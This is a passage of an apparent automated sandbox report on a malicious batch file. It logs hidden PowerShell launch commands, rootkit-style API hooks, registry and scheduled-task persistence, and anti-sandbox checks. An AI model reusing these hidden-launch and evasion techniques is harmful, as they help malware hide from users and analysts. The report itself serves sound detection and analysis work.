        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\System32\more.comSection loaded: fsutilext.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: uy2g7z.batStatic file information: File size 6277741 > 1048576
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\acrobat_sbx.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831535~1. source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorU source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ~1.PDB source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1637910800.000001590D82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2706612697.000001590D82B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 0000000D.00000003.1571314943.0000022FD0980000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 0000000D.00000003.1776106983.0000022FCEF6F000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Cl source: svchost.exe, 00000016.00000002.2711251083.000001590D843000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1638114927.000001590D843000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000016.00000000.1638163161.000001590D85C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2713166786.000001590D85C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\uy2g7z.bat' -ArgumentList 'wjzJMHoFZaIaceAGUG' -WindowStyle Hidden"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exe Code function: 3_3_000001D54F9EC62D push rcx; retf 003Fh 3_3_000001D54F9EC62E
        Source: C:\Windows\System32\conhost.exe Code function: 4_3_00000281B7BAC62D push rcx; retf 003Fh 4_3_00000281B7BAC62E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF7C77619BC pushad ; ret 5_2_00007FF7C77619C9
        Source: C:\Windows\System32\more.com Code function: 9_3_000001F66CF5C62D push rcx; retf 003Fh 9_3_000001F66CF5C62E
        Source: C:\Windows\System32\winlogon.exe Code function: 13_3_0000022FCEE0C62D push rcx; retf 003Fh 13_3_0000022FCEE0C62E
        Source: C:\Windows\System32\lsass.exe Code function: 14_3_0000019AB935C62D push rcx; retf 003Fh 14_3_0000019AB935C62E
        Source: C:\Windows\System32\svchost.exe Code function: 15_3_000001A53E9CC62D push rcx; retf 003Fh 15_3_000001A53E9CC62E
        Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002382E98C62D push rcx; retf 003Fh 16_3_000002382E98C62E
        Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000027D8F4AC62D push rcx; retf 003Fh 17_3_0000027D8F4AC62E
        Source: C:\Windows\System32\svchost.exe Code function: 18_3_000001AD09E8C62D push rcx; retf 003Fh 18_3_000001AD09E8C62E
        Source: C:\Windows\System32\svchost.exe Code function: 19_3_0000020EBF9EC62D push rcx; retf 003Fh 19_3_0000020EBF9EC62E
        Source: C:\Windows\System32\svchost.exe Code function: 20_3_00000229EA68C62D push rcx; retf 003Fh 20_3_00000229EA68C62E
        Source: C:\Windows\System32\svchost.exe Code function: 24_3_00000276D72AC62D push rcx; retf 003Fh 24_3_00000276D72AC62E
        Source: C:\Windows\System32\svchost.exe Code function: 25_3_0000021D846AC62D push rcx; retf 003Fh 25_3_0000021D846AC62E
        Source: C:\Windows\System32\svchost.exe Code function: 26_2_0000025BFDA7C62D push rcx; retf 003Fh 26_2_0000025BFDA7C62E
        Source: C:\Windows\System32\svchost.exe Code function: 27_3_000001691454C62D push rcx; retf 003Fh 27_3_000001691454C62E
        Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$nya-CDdDgiS8

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwQueryKey
        Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x98 0x83 0x32 0x2D 0xDF
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
        Source: C:\Windows\System32\svchost.exe | WMI Queries: MSSmBios_RawSMBiosTables
        Source: C:\Windows\System32\svchost.exe | WMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
        Source: C:\Windows\System32\svchost.exe | WMI Queries: MSAcpi_ThermalZoneTemperature
        Source: C:\Windows\System32\svchost.exe | WMI Queries: WDMClassesOfDriver.ClassName="MSAcpi_ThermalZoneTemperature",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3658Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2644Jump to behavior
        Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1118Jump to behavior
        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1105Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4986Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1578Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4801Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4953Jump to behavior
        Source: C:\Windows\System32\more.comWindow / User API: threadDelayed 1082Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6458Jump to behavior
        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 952Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7519Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 944Jump to behavior
        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 837Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1342Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8236Jump to behavior
        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 708Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1366Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1367Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1280Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1207Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1120Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1289Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1283Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1255Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1237Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1265Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1268Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1186Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1143Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1174Jump to behavior
        Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1211Jump to behavior
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1166
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 813
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 799
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 795
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 789
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 772
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 803
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 767
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1031
        Source: C:\Windows\System32\spoolsv.exe | Window / User API: threadDelayed 1073
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1039
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1081
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1080
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1104
        Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 704
        Source: C:\Windows\System32\cmd.exe | API coverage: 9.8 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.6 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.9 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.3 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.4 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.5 %
        Source: C:\Windows\System32\svchost.exe | API coverage: 9.4 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8440 | Thread sleep count: 3658 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436 | Thread sleep count: 2644 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8496 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\cmd.exe TID: 2640 | Thread sleep time: -55900s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608 | Thread sleep count: 4986 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8608 | Thread sleep count: 1578 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640 | Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8624 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972 | Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\more.com TID: 5396 | Thread sleep count: 1082 > 30
        Source: C:\Windows\System32\more.com TID: 5396 | Thread sleep time: -54100s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 9168 | Thread sleep count: 6458 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 9168 | Thread sleep time: -6458000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 9156 | Thread sleep count: 952 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 9156 | Thread sleep time: -95200s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 9196 | Thread sleep count: 7519 > 30
        Source: C:\Windows\System32\lsass.exe TID: 9196 | Thread sleep time: -7519000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 9200 | Thread sleep count: 944 > 30
        Source: C:\Windows\System32\lsass.exe TID: 9200 | Thread sleep time: -47200s >= -30000s
